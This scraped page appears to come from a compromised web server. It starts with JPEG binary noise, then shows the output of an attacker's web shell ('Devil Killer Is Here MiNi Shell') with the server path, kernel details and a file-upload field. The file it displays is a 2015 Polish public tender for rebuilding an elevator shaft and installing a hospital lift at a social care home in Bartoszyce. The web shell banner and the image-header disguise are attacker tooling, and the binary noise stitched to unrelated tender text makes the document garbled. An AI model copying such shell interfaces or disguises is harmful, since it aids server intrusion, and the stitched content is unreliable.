JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150812/205872-N-2015.html

<p class="kh_header"><b>Bartoszyce: Przebudowa szybu windowego z windą typu szpitalnego z uwzględnieniem rozbudowy zjazdu o jedną kondygnację poniżej z uwzględnieniem przystanków na parterze i w piwnicy i jedną kondygnację powyżej w stosunku do stanu istniejącego w budynku Domu Pomocy Społecznej w Bartoszycach</b><br>
<b>Numer ogłoszenia: 205872 - 2015; data zamieszczenia: 12.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Bohaterów Monte Cassino 4, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 89 7622122, faks 89 7622122.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa szybu windowego z windą typu szpitalnego z uwzględnieniem rozbudowy zjazdu o jedną kondygnację poniżej z uwzględnieniem przystanków na parterze i w piwnicy i jedną kondygnację powyżej w stosunku do stanu istniejącego w budynku Domu Pomocy Społecznej w Bartoszycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:Przebudowa szybu windowego z windą typu szpitalnego z uwzględnieniem rozbudowy zjazdu o jedną kondygnację poniżej z uwzględnieniem przystanków na parterze i w piwnicy i jedną kondygnację powyżej w stosunku do stanu istniejącego w budynku Domu Pomocy Społecznej w Bartoszycach
4.	przedmiot zamówienia obejmuje w szczególności wykonanie:
Zakres prac do wykonania:
wykonanie odwiertów
wykonanie wykopów pod fundamenty;
wykonanie podbicia szybu windowego poprzez odcinkowe wykonanie monolitycznych ław i ścian fundamentowych żelbetowych z betonu wodoszczelnego B25 W-8 zbrojonego wraz z rozbiórkami istniejących elementów żelbetowych
wykonanie zamurowań w ścianach
wykonanie obniżenia fragmentu stropu
wykonanie posadzki w przedsionku przed windą
wykonanie tynków wewnętrznych na ścianach i sufitach wraz z malowaniem
wykonanie nadproży
izolacje projektowanego stropu w przedsionku przy windzie
przebudowa fragmentu instalacji centralnego ogrzewania
roboty elektryczne w zakresie: oświetlenia, gniazd wtyczkowych, siły i przeciwporażeniowe;
demontaż istniejącego dźwigu osobowego, wraz z przygotowaniem odpowiedniej dokumentacji dotyczącej wyrejestrowania dźwigu ;
zdemontowany dźwig, stanowiący własność Zamawiającego, Wykonawca we własnym zakresie (załadunek oraz transport) dostarczy w imieniu Zamawiającego do punktu skupu złomu i przedłoży Zamawiającemu dowód ich przyjęcia 
montaż nowej windy wraz z urządzeniami;
montaż drzwi szybowych o odporności ogniowej EI 60
wymiana istniejących drzwi do podszybia na poddaszu na stalowe o odporności ogniowej EI 60
roboty wykończeniowe;
uporządkowanie placu budowy;
ocena zgodności przez UDT-CERT;
rejestracja w Urzędzie Dozoru Technicznego;
konserwacja windy w okresie gwarancji.

Parametry dźwigu osobowego dla osób niepełnosprawnych:

Dźwig osobowy typu szpitalnego z napędem elektryczny LE -1600EM
Udźwig: 1625 kg lub 21 osób,
Wysokość podnoszenia: 13,50m,
Ilość przystanków/dojść: 6/6 
Napęd dźwigu:
2:1; moc nominalna 10,6kW, wciągarka bezreduktorowa, prędkość 1 m/s.
Drzwi (wymiar: szerokość 1200 x wysokość 2000mm):
kabinowe: stalowe, obłożone stalą nierdzewną szlifowaną (304).
szybowe: stalowe, obłożone stalą nierdzewną szlifowaną (304). Między drzwiami kabinowymi a szybowymi listwa sensorowa umożliwiająca regulację napełnienia kabiny oraz służąca, jako jeden z możliwych elementów antyzakleszczających:
prędkość zamykania i otwierania drzwi regulowana; czasy zamknięcia i otwarcia drzwi
regulowane,
próg drzwi aluminiowy, profil z rowkiem prowadzącym
c)	kontrola   drzwi:    mechanizm    nawrotu    zapewniający    ograniczenie    nacisku    skrzydła
przy napotkaniu przeszkody (max. 15 kg)
drzwi szybowe w wykonaniu: klasa SOLID, odporność ogniowa EI60.
drzwi kabinowe w wykonaniu: klasa SOLID.
Kabina (wymiar: szerokość 1400 x głębokość 2400 x wysokość 2100mm):
ściany kabiny: wykonane z paneli układanych poziomo, obłożone stalą nierdzewną szlifowaną (304), panele tłumiące hałas, pomiędzy panelami fuga ze stali nierdzewnej szlifowanej (304),
kabina przelotowa 180°,
sufit: podwieszany, wykonany ze stali nierdzewnej szlifowanej (304) z automatycznym oświetleniem LED,
lustro: 2 lustra na ścianie bocznej,
poręcze: mocowane na bocznych ścianach, okrągłe ze stali nierdzewnej szlifowanej (304),
cokół: wykonany z blachy nierdzewnej,
podłoga: wykładzina trudnościeralna, antypoślizgowa.
Panel dyspozycji
2 panele pełnej wysokości kabiny wykonane ze stali nierdzewnej szlifowanej (304), wyposażone w przyciski opisane w języku Braile, z podświetleniem na obwodzie potwierdzającym przyjęcie dyspozycji. Panele dyspozycji zawierają elementy:
kolorowy wyświetlacz TFT pokazującym piętra, strzałki kierunku jazdy, godzinę i datę, temperaturę w kabinie,
awaryjne oświetlenie - system oświetla kabinę w przypadku braku zasilania z normalnego źródła z 2 godzinnym podtrzymaniem,
sygnalizację przeciążeniową kabiny,
awizacja głosowa przystanków,
przyciski:
sygnalizacja alarmowa akustyczna,
oznaczenia pięter,
otwarcia drzwi,
zamknięcia drzwi.
Kasety wezwań
wykonane ze stali nierdzewnej szlifowanej (304), wyposażone w wyświetlacz z piętrowskazywaczem, przycisk wezwania z oznaczeniem świetlnym potwierdzającym przyjęcie dyspozycji,
Sterowanie
z regulacją prędkości: układ regulacyjny prędkości umożliwia płynny start i zatrzymanie kabiny na przystankach oraz zatrzymanie kabiny na poziomie przystanku.
System Komunikacji Awaryjnej
zapewnia głosowe połączenie kabiny ze służbami ratowniczymi w sytuacji awaryjnej. Podłączony jest do sieci GSM i wybiera numer telefonu komórkowego konserwatora dźwigu. Działa niezależnie od źródeł zasilania w windzie i nie wymaga zasilania awaryjnego.
System jazd pożarowych
w przypadku zadziałania alarmu pożaru zjazd dźwigu na poziom zaprogramowany, otwarcie drzwi i blokada dźwigu.
Funkcje sterowania instalowanego dźwigu:
tablica wstępna zasilania
sterowanie zbiorcze góra dół,
parkowanie na przystanku podstawowym,
jazda ciągła 
zatrzymanie na każdym przystanku z możliwością włączenia wyłączenia funkcji,
sterowanie napędami: jednobiegowy, falownikowy, falownikowy z enkoderem,
kaseta jazd rewizyjnych,
tymczasowe wyłączanie przystanków z obsługi w programie sterowania,
rejestracja ostatnich zdarzeń usterek i awarii w pamięci trwałej EEPROM z datą i godziną wystąpienia,
podświetlany tekstowy wyświetlacz typu LCD wbudowany do sterownika,
wbudowane klawisze sterujące modyfikacjami parametrów i odczytów Tekstowe menu,
monitorowanie sygnałów wejść/wyjść sterownika w języku polskim,
wyświetlanie stanu pracy przekaźników sterownika,
świetlną i dźwiękową sygnalizację przeciążenia kabiny,
gong z regulacją ą natężenia dźwięku,
wyświetlanie stanu pracy 4 punktów obwodu bezpieczeństwa,
rozproszony system sterowania (moduły piętrowe, kabinowe),
współpraca z istniejącym systemem ochrony ppoż. budynku
sterowanie oświetleniem kabiny na postoju (energooszczędność),
wskazania piętrowskazywaczy płynące zgodnie z kierunkiem jazdy,
detekcja zablokowanych przycisków wezwań i dyspozycji,
programowalne funkcje specjalne przycisków (kasowanie dyspozycji, zamykanie drzwi, kasowanie fikcyjnych dyspozycji),
komunikaty tekstowe o awarii na piętrowskazywaczach podawane w języku polskim,
współpraca z falownikami wyposażonymi w aplikację dźwigową oraz wyświetlacz LCD z polskim menu,
dźwig wyposażony w zasilacz UPS umożliwiający automatyczny zjazd po zaniku napięcia do najbliższego przystanku, wraz z otwarciem drzwi kabinowych, tym samym uwolnieniem pasażerów,
komunikacja z kabiny ze służbami alarmowymi za pomocą modułu GSM (karta SIM Użytkownika),
Dokumenty i normy jakim powinien odpowiadać dźwig:
certyfikat zgodności wystawiony przez Jednostkę Notyfikowaną,
zgodność z normami zharmonizowanymi,
dokumentacja powykonawcza wraz z protokołem UDT dopuszczającym dźwig do użytkowania w wersji papierowej i elektronicznej nieedytowalnej dołączona do odbioru końcowego zadania.
Inne uwagi:
Zamawiający dopuszcza wykorzystanie elementów istniejących (po ocenie Wykonawcy dźwigu) dla przeciwwagi, klocków przeciwwagi i prowadnic dźwigowych,
wymogiem Zamawiającego jest, aby sterowanie, kasety wezwań, panel dyspozycji, kabina wraz z ramą kabinową, rama przeciwwagi od jednego producenta,
wymogiem Zamawiającego jest aby dźwig był wykonany z wysokiej  jakości komponentów.
Zamawiający wymaga aby Wykonawca zapewnił bezpłatną konserwację w okresie gwarancyjnym. producent musi zapewnić dostęp do wszystkich części zamiennych min. przez okres 10 lat po oddaniu urządzenia do eksploatacji,
dostarczenia Zamawiającemu, na okres wyłączenia z eksploatacji dźwigu, jednego schodołazu do transportu osób niepełnosprawnych poruszających się na wózkach

5.	wymagania dotyczące serwisu jak niżej:
Maksymalny czas naprawy nie może przekroczyć 2 dni roboczych licząc od chwili przyjęcia zgłoszenia.
Możliwość zgłoszeń 24 godz./dobę, 365/366 dni w roku.
Instrukcja obsługi w języku polskim -  w formie papierowej i elektronicznej (wraz z dostawą urządzenia).

6.	wymagania dotyczące przeglądów okresowych
Wykonanie, w cenie oferty, po okresie gwarancji minimum jednego przeglądu.
7.	szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót - załączniki Nr 10, 11 i 12 do specyfikacji istotnych warunków zamówienia.
8.	Wykonawca musi uwzględnić, że wymiana windy będzie prowadzona w budynku czynnego Domu Pomocy Społecznej w Bartoszycach i prowadzone prace nie mogą zakłócać pracy jednostki. W godzinach od 2200 - 700 prace na terenie budynku nie mogą być wykonywane.
9.	Wykonawca  przedstawi Zamawiającemu harmonogram prac jakie będą przeprowadzane na terenie Domu Pomocy Społecznej w Bartoszycach.  
10.	odnośnie wywozu odpadów powstałych w związku z realizacją zamówienia wykonawca zobowiązany będzie do zagospodarowania elementów rozbiórkowych zgodnie z ustawą z dnia 14 grudnia 2012 r. 
o odpadach (Dz.U. 2013 r., poz. 21 z późn. zm.). Wykonawca będzie zobowiązany do przekazania Zamawiającemu odpowiednich dokumentów potwierdzających utylizację.
11.	znaki towarowe - w przypadku, gdy Zamawiający w opisie przedmiotu zamówienia wskazuje znaki towarowe, patenty lub pochodzenie wymaga, aby zastosowane wyroby innych firm były nie gorsze od proponowanych lub równoważne oraz posiadały niezmienne lub równoważne parametry techniczne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych, tj. udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, wykonawcy robót budowlanych, zamówień uzupełniających w trybie z wolnej ręki, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.10-2, 45.10.00.00-8, 71.35.19.10-5, 45.11.13.00-1, 45.32.00.00-6, 45.43.21.00-5, 45.43.21.20-1, 45.33.11.00-7, 45.43.00.00-0, 45.43.10.00-7, 45.43.10.00-8, 45.41.00.00-4, 45.44.21.00-8, 45.22.35.00-1, 45.26.23.00-4, 45.26.23.10-7, 45.31.31.00-5, 45.31.10.00-0, 45.31.57.00-5, 45.31.11.00-1, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu według wzoru - załącznik nr 1 do SIWZ.
Zamawiający dokona oceny spełniania w.w. warunków zgodnie z formułą spełnia, nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez wykonawcę,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oferent wykaże się realizacją co najmniej 2 zadań z zakresu budowy windy w budynku użyteczności publicznej.
Robota winna być zrealizowana w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Zamawiający dokona oceny spełniania w.w. warunków zgodnie z formułą spełnia, nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez wykonawcę,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 1 do SIWZ.
Zamawiający dokona oceny spełniania w.w. warunków zgodnie z formułą spełnia, nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez wykonawcę,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże,że dysponuje lub będzie dysponował
kierownikiem budowy - musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń  w specjalności konstrukcyjno-budowlanej, oraz min. 5 lat doświadczenia na stanowisku kierownika budowy; nadzorowanie co najmniej jednego kontraktu obejmującego budowę windy;
kierownik robót elektrycznych - musi posiadać uprawnienia w zakresie sieci, inst. i urządzeń elektrycznych i elektroenergetycznych i min. 2 lata doświadczenia na stanowisku kierownika robót w branży instalacji elektrycznej.
Zamawiający dokona oceny spełniania w.w. warunków zgodnie z formułą spełnia, nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu według wzoru załącznik nr 1 do SIWZ. 
Zamawiający dokona oceny spełniania w.w. warunków zgodnie z formułą spełnia, nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez wykonawcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz oferty według wzoru stanowiącego załącznik Nr 4 do specyfikacji istotnych warunków zamówienia;
b)	 wykaz części zamówienia których wykonanie wykonawca zamierza powierzyć podwykonawcom, według wzoru stanowiącego załącznik Nr 8 do specyfikacji istotnych warunków zamówienia, wraz ze wskazaniem zakresu wykonywanych prac przez podwykonawców
c)	oświadczenie zgodne z art. 22 ust. 1 ustawy Prawo zamówień publicznych (zgodnie z załącznikiem Nr 1 do specyfikacji istotnych warunków zamówienia),
d)	Pisemne zobowiązanie podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonania zamówienia, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków,

Treść zobowiązania innego podmiotu powinna określać:
1) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
2) zakresu dostępnych wykonawcy zasobów innego podmiotu,
3) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu
zamówienia,
4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
	Zobowiązanie musi być podpisane przez osobę uprawnioną do reprezentacji podmiotu trzeciego.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela Wykonawcy wymagają załączenia do oferty właściwego pełnomocnictwa. Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej za zgodność przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - gwarancja - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian postanowień umowy w stosunku do treści złożonej oferty na podstawie której dokonano wyboru wykonawcy:
1)	zmiana terminu realizacji zamówienia w przypadku:
